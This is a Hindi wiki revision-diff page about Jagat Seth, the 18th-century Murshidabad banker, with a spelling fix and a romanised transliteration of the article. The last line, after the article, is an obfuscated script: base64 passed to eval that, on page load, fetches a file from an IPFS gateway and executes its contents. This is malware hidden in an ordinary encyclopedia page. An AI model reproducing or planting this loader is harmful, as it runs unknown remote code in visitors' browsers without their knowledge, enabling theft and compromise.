Difference between revisions of "जगत सेठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "सिक्के" to "सिक़्क़े")
m (Text replace - "सिक़्क़े" to "सिक्के")
Line 1: Line 1:
 
'''जगत सेठ''' नवाब [[सिराजुद्दौला]] के शासनकाल में [[मुर्शिदाबाद]] का एक अमीर व्यापारी था। उसे 'फ़तेहचंद्र' नाम से भी जाना जाता था। मुर्शिदाबाद में वह जैन मारवाड़ी व्यवसायी परिवार से आया था। [[बंगाल]] के बहुत धनी महाजन मलिकचंद्र के गोद लिए हुए लड़के फ़तेहचंद्र को [[दिल्ली]] के बादशाह ने 1723 ई. में ‘जगत सेठ’ की उपाधि प्रदान की थी।
 
'''जगत सेठ''' नवाब [[सिराजुद्दौला]] के शासनकाल में [[मुर्शिदाबाद]] का एक अमीर व्यापारी था। उसे 'फ़तेहचंद्र' नाम से भी जाना जाता था। मुर्शिदाबाद में वह जैन मारवाड़ी व्यवसायी परिवार से आया था। [[बंगाल]] के बहुत धनी महाजन मलिकचंद्र के गोद लिए हुए लड़के फ़तेहचंद्र को [[दिल्ली]] के बादशाह ने 1723 ई. में ‘जगत सेठ’ की उपाधि प्रदान की थी।
 
==महत्त्वपूर्ण कार्य==
 
==महत्त्वपूर्ण कार्य==
जगत सेठ ने अपनी कोठियाँ [[ढाका]], ([[बांग्ला देश]]), [[पटना]] और मुर्शिदाबाद में स्थापित की थीं। उसकी कोठी से रुपयों का लेन-देन तो होता ही था, वह [[बंगाल]] की सरकार के भी कई कार्यों को पूर्ण करने का काम करती थीं। प्रान्तीय सरकार की तरफ़ से [[मालगुज़ारी]] वसूल करना, शाही खज़ाने को [[दिल्ली]] भेजना, सिक़्क़े की विनिमय दर तय करना आदि भी जगत सेठ की ही ज़िम्मेदारी थी।
+
जगत सेठ ने अपनी कोठियाँ [[ढाका]], ([[बांग्ला देश]]), [[पटना]] और मुर्शिदाबाद में स्थापित की थीं। उसकी कोठी से रुपयों का लेन-देन तो होता ही था, वह [[बंगाल]] की सरकार के भी कई कार्यों को पूर्ण करने का काम करती थीं। प्रान्तीय सरकार की तरफ़ से [[मालगुज़ारी]] वसूल करना, शाही खज़ाने को [[दिल्ली]] भेजना, सिक्के की विनिमय दर तय करना आदि भी जगत सेठ की ही ज़िम्मेदारी थी।
 
====जगत सेठ उपाधि====
 
====जगत सेठ उपाधि====
 
फ़तेहचंद्र (जगत सेठ) के बाद उसका पौत्र 'महताबचंद्र' दूसरा जगत सेठ बना। जब नवाब [[सिराजुद्दौला]] ने उसे अपमानित किया, तो वह [[अंग्रेज़|अंग्रेज़ों]] के पक्ष में चला गया और [[प्लासी का युद्ध|प्लासी की लड़ाई]] से पहले और बाद में रुपये पैसों से उनकी बड़ी मदद की। यद्यपि [[मीर ज़ाफ़र]] के नवाब होने पर उसे फिर सम्मान प्राप्त हो गया था, और जगत सेठ का नाम एक महत्त्वपूर्ण उपाधि बन चुका था, किंतु [[मीर क़ासिम]] ने गद्दी पर बैठते ही उसकी वफ़ादारी पर संदेह करके 1763 ई. में उसे मरवा डाला। इसके बाद ही बंगाल का शासन अंग्रेज़ों के हाथ में आ गया और उन्होंने ‘[[ईस्ट इंडिया कंपनी]]’ के ऊपर जगत सेठ का कोई कर्ज़ होने से इंकार कर दिया।
 
फ़तेहचंद्र (जगत सेठ) के बाद उसका पौत्र 'महताबचंद्र' दूसरा जगत सेठ बना। जब नवाब [[सिराजुद्दौला]] ने उसे अपमानित किया, तो वह [[अंग्रेज़|अंग्रेज़ों]] के पक्ष में चला गया और [[प्लासी का युद्ध|प्लासी की लड़ाई]] से पहले और बाद में रुपये पैसों से उनकी बड़ी मदद की। यद्यपि [[मीर ज़ाफ़र]] के नवाब होने पर उसे फिर सम्मान प्राप्त हो गया था, और जगत सेठ का नाम एक महत्त्वपूर्ण उपाधि बन चुका था, किंतु [[मीर क़ासिम]] ने गद्दी पर बैठते ही उसकी वफ़ादारी पर संदेह करके 1763 ई. में उसे मरवा डाला। इसके बाद ही बंगाल का शासन अंग्रेज़ों के हाथ में आ गया और उन्होंने ‘[[ईस्ट इंडिया कंपनी]]’ के ऊपर जगत सेठ का कोई कर्ज़ होने से इंकार कर दिया।

Revision as of 11:03, 3 March 2013

jagat seth navab sirajuddaula ke shasanakal mean murshidabad ka ek amir vyapari tha. use 'fatehachandr' nam se bhi jana jata tha. murshidabad mean vah jain marava di vyavasayi parivar se aya tha. bangal ke bahut dhani mahajan malikachandr ke god lie hue l dake fatehachandr ko dilli ke badashah ne 1723 ee. mean ‘jagat seth’ ki upadhi pradan ki thi.

mahattvapoorn kary

jagat seth ne apani kothiyaan dhaka, (baangla desh), patana aur murshidabad mean sthapit ki thian. usaki kothi se rupayoan ka len-den to hota hi tha, vah bangal ki sarakar ke bhi kee karyoan ko poorn karane ka kam karati thian. prantiy sarakar ki taraf se malaguzari vasool karana, shahi khazane ko dilli bhejana, sikke ki vinimay dar tay karana adi bhi jagat seth ki hi zimmedari thi.

jagat seth upadhi

fatehachandr (jagat seth) ke bad usaka pautr 'mahatabachandr' doosara jagat seth bana. jab navab sirajuddaula ne use apamanit kiya, to vah aangrezoan ke paksh mean chala gaya aur plasi ki l daee se pahale aur bad mean rupaye paisoan se unaki b di madad ki. yadyapi mir zafar ke navab hone par use phir samman prapt ho gaya tha, aur jagat seth ka nam ek mahattvapoorn upadhi ban chuka tha, kiantu mir qasim ne gaddi par baithate hi usaki vafadari par sandeh karake 1763 ee. mean use marava dala. isake bad hi bangal ka shasan aangrezoan ke hath mean a gaya aur unhoanne ‘eest iandiya kanpani’ ke oopar jagat seth ka koee karz hone se iankar kar diya.

avanati

isake kuchh samay bad hi jagat seth gharane ki avanati shuroo ho gee. phir bhi 1912 ee. tak is gharane ke kisi n kisi vyakti ko jagat seth ki upadhi aur tho di-bahut peanshan aangrezoan ki taraf se milati rahi. 1912 ee. ke bad yah silasila bhi band ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>